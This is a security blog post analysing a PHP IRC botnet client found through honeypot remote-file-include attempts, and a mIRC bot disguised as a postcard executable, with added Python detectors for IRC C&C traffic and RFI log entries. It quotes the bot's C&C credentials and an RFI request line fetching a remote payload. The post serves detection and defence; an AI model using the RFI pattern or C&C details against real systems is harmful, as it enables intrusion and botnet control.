
Wednesday, 18 February 2009

PBot a PHP Bot found in Honeypots RFIs

While going through a couple dozen newer RFIs, I found a suspect file that turned out to be more than the usual RFI.
I thought some of my readers would like more information on this one. The file was called pbot.txt and was downloaded from a server in Taiwan.

This file turns out to be a decently coded PHP Bot which connects to an IRC C&C. The IRC Server is located at irc.indoirc.net - which hosts a handful of smaller botnets, but also appears to be somewhat legitimate.

The bot joins a C&C channel, in this case #AnakDompu, and waits for commands. This version of the bot allows for UDP and TCP flooding and a connect-back shell. The shell is written in Perl and is commonly found in many Perl bots and newbie hacker kits. Google searches for dc.pl will turn up many examples.

The bot contains the dc.pl Perl script as base64-encoded text. Since web servers commonly run in datacenters with a good deal of bandwidth, the TCP and UDP flooding capabilities are generally more successful than those on a home machine with limited upload speed.

A couple thousand of these bots could easily compare to 30 or 40 thousand DSL/cable user bots. Lucky for us, there are only 36 bots connected at this time.

I'm sure the bot author is still wondering why his commands aren't working on my snoopbot. He hasn't kicked/banned the fake bot, and continues to issue commands that just don't work.

Normally I have to work to strip the C&C information out of the bots. These guys made it easier on me...

"server"=>"irc.indoirc.net",
"port"=>"6667",
"pass"=>"Walau.Jelek.Tetap.Bilang.Cakep.La",
"prefix"=>"ManieZ",
"maxrand"=>8,
"chan"=>"#AnakDompu",
"chan2"=>"#AnakDompu",
"key"=>"",
"modes"=>"+iBx",
"password"=>"AnakDompu",
"trigger"=>"~",
"hostauth"=>"Orang.Cakep.Tetap.Bilang.C-a-K-e-P.Co.Cc" // * for any hostname

Most of the standard IRC IDS signatures will work in this case.
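To show what those signatures look for, here is an added example (not code from the original post or from the bot) that walks a captured IRC session and fires on the generic indicators an IDS keys on (a web server sending NICK/USER/JOIN at all) plus the bot-specific ones lifted from the configuration quoted above: the server password, the nick prefix, the +iBx user modes, the #AnakDompu channel, the "~" command trigger and the master's authorised hostname. The capture itself, the nick suffix, the master's hostmask and the "~status" command are constructed; the assumption that "maxrand" bounds the length of the random nick suffix is mine.

```python
import re

# Constructed sample of a bidirectional IRC capture between an infected web
# server and the C&C, modelled on the configuration quoted in the post.
# Server-originated lines carry a ":prefix"; the nick suffix, the master's
# hostmask and the "~status" command are made up for illustration.
SAMPLE_SESSION = [
    "PASS Walau.Jelek.Tetap.Bilang.Cakep.La",
    "NICK ManieZ48213907",
    "USER ManieZ 0 * :ManieZ",
    "MODE ManieZ48213907 +iBx",
    "JOIN #AnakDompu",
    ":master!op@Orang.Cakep.Tetap.Bilang.C-a-K-e-P.Co.Cc PRIVMSG #AnakDompu :~status",
]

# Indicators taken from the bot configuration quoted in the post.
KNOWN_SERVER_PASS = "Walau.Jelek.Tetap.Bilang.Cakep.La"
KNOWN_CHANNELS = {"#anakdompu"}
KNOWN_HOSTAUTH = "Orang.Cakep.Tetap.Bilang.C-a-K-e-P.Co.Cc"
KNOWN_MODES = "+iBx"
TRIGGER = "~"
NICK_PREFIX = "ManieZ"
NICK_MAXRAND = 8  # assumption: "maxrand"=>8 bounds the random nick suffix
NICK_RE = re.compile(r"^%s[A-Za-z0-9]{1,%d}$" % (re.escape(NICK_PREFIX), NICK_MAXRAND))


def parse_irc_line(line):
    """Split a raw IRC line into (prefix, command, params, trailing)."""
    line = line.strip()
    prefix = None
    if line.startswith(":"):                 # server/peer-originated line
        prefix, _, line = line[1:].partition(" ")
    if " :" in line:                         # trailing parameter
        line, _, trailing = line.partition(" :")
    else:
        trailing = None
    parts = line.split()
    if not parts:
        return None
    return prefix, parts[0].upper(), parts[1:], trailing


def scan_session(lines):
    """Return the set of indicator names that fire on a captured session."""
    findings = set()
    for raw in lines:
        parsed = parse_irc_line(raw)
        if parsed is None:
            continue
        prefix, cmd, params, trailing = parsed
        # Generic IRC-client signature: the monitored host registers or joins.
        if cmd in ("NICK", "USER", "JOIN") and prefix is None:
            findings.add("generic_irc_client")
        # Bot-specific indicators from the quoted configuration.
        if cmd == "NICK" and params and NICK_RE.match(params[0]):
            findings.add("pbot_nick_pattern")
        if cmd == "PASS" and params and params[0] == KNOWN_SERVER_PASS:
            findings.add("pbot_server_password")
        if cmd == "JOIN" and params and params[0].lower() in KNOWN_CHANNELS:
            findings.add("pbot_cnc_channel")
        if cmd == "MODE" and KNOWN_MODES in params:
            findings.add("pbot_user_modes")
        if cmd == "PRIVMSG" and trailing and trailing.startswith(TRIGGER):
            findings.add("pbot_trigger_command")
        if prefix and prefix.split("@")[-1] == KNOWN_HOSTAUTH:
            findings.add("pbot_master_hostmask")
    return findings


if __name__ == "__main__":
    for name in sorted(scan_session(SAMPLE_SESSION)):
        print("hit:", name)
```

The generic indicator is the one that survives when the operator rotates password, channel and nick prefix: a web server that speaks IRC at all is the signal worth alerting on, and the bot-specific strings then confirm which family it is.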

Note: Monitoring bots should always be done with the consent of your ISP. I have permission from my ISPs to perform these monitoring activities and to run honeypots. As they say, don't try this at home.

For those who know what they're doing, and are authorized by their ISPs to do so, my honeypot log entry is provided below.

89.218.85.18 - - [01/Jan/2009:14:18:37 -0500] "GET --VULNERABILITY REDACTED--=http:// c-a-k-e-p.co.cc /adu /pbots.txt??? HTTP/1.1" 200 2324 - "-" "libwww-perl/5.805" "-"

Note: the 200 status code is a feature of my honeypot; it returns 200 for all pages, found or not. I added the spaces above to keep from accidental clicks.
I removed the vulnerable page information, because I don't think it's helpful to give that level of detail.
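The log entry above has the shape that makes RFI attempts easy to pick out of an access log: a query parameter whose value is a full URL pointing at a script-like file, a trailing run of "?" to swallow whatever the vulnerable include appends, and a scripting-library user agent. The following is an added example (not from the original post) that scans Apache combined-format lines for that combination and separates real RFI attempts from benign parameters that merely carry a URL. The log lines are constructed: the first is modelled on the post's entry with the redacted parameter name replaced by the made-up "page" and the include host replaced by the reserved name "example.invalid".

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format log lines. The first is modelled on the
# honeypot entry in the post, with the redacted parameter name replaced by the
# made-up "page" and the include host by the reserved name "example.invalid";
# the other two are ordinary requests, the last one carrying a remote URL for
# a legitimate reason.
SAMPLE_LOG = """\
89.218.85.18 - - [01/Jan/2009:14:18:37 -0500] "GET /index.php?page=http://example.invalid/adu/pbots.txt??? HTTP/1.1" 200 2324 "-" "libwww-perl/5.805"
10.0.0.5 - - [01/Jan/2009:14:20:01 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2009:14:21:14 -0500] "GET /redirect.php?url=https://example.invalid/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Remote value ends in a script-like file, optionally followed by the "?"
# padding RFI payloads use to neutralise whatever the include appends.
SCRIPT_LIKE = re.compile(r"\.(?:php|txt|inc|dat)(?:\?|$)", re.IGNORECASE)
SCANNER_UAS = ("libwww-perl",)


def remote_url_params(target):
    """Yield (name, value) for query parameters whose value is an absolute URL."""
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            yield name, value


def analyze_line(line):
    """Classify one access-log line; None when it is not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    remote = list(remote_url_params(m.group("target")))
    if not remote:
        return None
    script_like = any(SCRIPT_LIKE.search(v) for _, v in remote)
    scanner_ua = any(s in m.group("ua").lower() for s in SCANNER_UAS)
    verdict = "rfi_attempt" if (script_like or scanner_ua) else "remote_url_only"
    return {"ip": m.group("ip"), "verdict": verdict, "params": remote,
            "status": m.group("status"), "ua": m.group("ua")}


def scan_log(text):
    """Return the analysis records for every line that carried a remote URL."""
    return [r for r in (analyze_line(l) for l in text.splitlines()) if r]


if __name__ == "__main__":
    for rec in scan_log(SAMPLE_LOG):
        print(rec["ip"], rec["verdict"], rec["params"])
```

The "remote_url_only" verdict keeps redirectors and OpenID-style parameters out of the alert queue; on a real server, a second pass that checks whether the named parameter is one the application actually includes would tighten it further.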

--- Another IRC bot:

A postcard? -- Nah.. A MIRC bot.

This little jewel comes from our mailbag. It was included as a binary, no source host for infection.

The file, postcard.exe, is actually a RAR compressed SFX archive. When run, a RAR script that calls a batch file is launched. The batch file opens a mountain scene picture entitled xmas.jpg.

It also runs a copy of mIRC and places that same binary in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
It uses a likely stolen/generated mIRC license ending with 6732.

It installs itself in C:\Windows\temp\spoolsv\spoolsv.exe, which would be okay, except that that directory
isn't writable on my system as a normal user. That and the location of the run key mean it will only infect
those who run with administrator rights.

mIRC bots are scripted by the inexperienced. Those that connect to public IRC servers like UnderNET prove
the author's inexperience.

This one joins the channel #romania on Undernet. I'm sure the IRCOps will be on it before too long, if they
actually have any hosts; I didn't bother to check.

Source :
http://www.disog.org/2009/01/pbot-php-bot-found-in-honeypots-rfis.html